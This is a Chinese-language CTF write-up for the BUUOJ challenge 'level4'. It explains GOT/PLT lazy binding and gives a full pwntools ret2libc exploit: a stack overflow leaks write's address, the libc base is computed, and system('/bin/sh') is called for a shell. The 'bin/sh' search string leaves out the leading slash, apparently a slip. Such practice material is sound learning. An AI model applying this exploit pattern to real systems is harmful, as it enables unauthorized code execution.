level4

只开了NX保护，32位栈溢出。

elf = ELF(proc_name)
write_plt = elf.plt['write']
write_got = elf.got['write']
main_addr = elf.sym['main']
payload = b'a' * (0x88 + 0x4) + p32(write_plt) + p32(main_addr) + p32(0x1) + p32(write_got) + p32(0x4)

没调用write函数前

got表存的是寻址的地址

跳转到write_got存的地址write_plt+6

总结起来就是，没调用write函数之前，write_got存的是write_plt+6这个地址，然后执行write_plt会去write_got里找write函数真正的地址，此时会执行write_plt+6这个地址寻址，找到write函数真正的地址后会把它存入write_got.

exp

from pwn import *
from LibcSearcher import *

context.log_level = 'debug'
proc_name = './level4'
p = process(proc_name)
#p=remote('node5.buuoj.cn',29402)                                                                                                                                                   
elf = ELF(proc_name)
write_plt = elf.plt['write']
write_got = elf.got['write']
main_addr = elf.sym['main']
payload = b'a' * (0x88 + 0x4) + p32(write_plt) + p32(main_addr) + p32(0x1) + p32(write_got) + p32(0x4)
gdb.attach(p)
sleep(1)
p.send(payload)
write_addr = u32(p.recv(4))
print(hex(write_addr))

#libc = LibcSearcher('write', write_addr)
libc=ELF('./libc-2.23_32.so')

libc_base = write_addr - libc.sym['write']
system_addr = libc_base + libc.sym['system']
str_bin_sh = libc_base + next(libc.search(b'bin/sh'))
payload1 = b'a' * (0x88 + 0x4) + p32(system_addr) + p32(main_addr) + p32(str_bin_sh)
p.send(payload1)

p.interactive()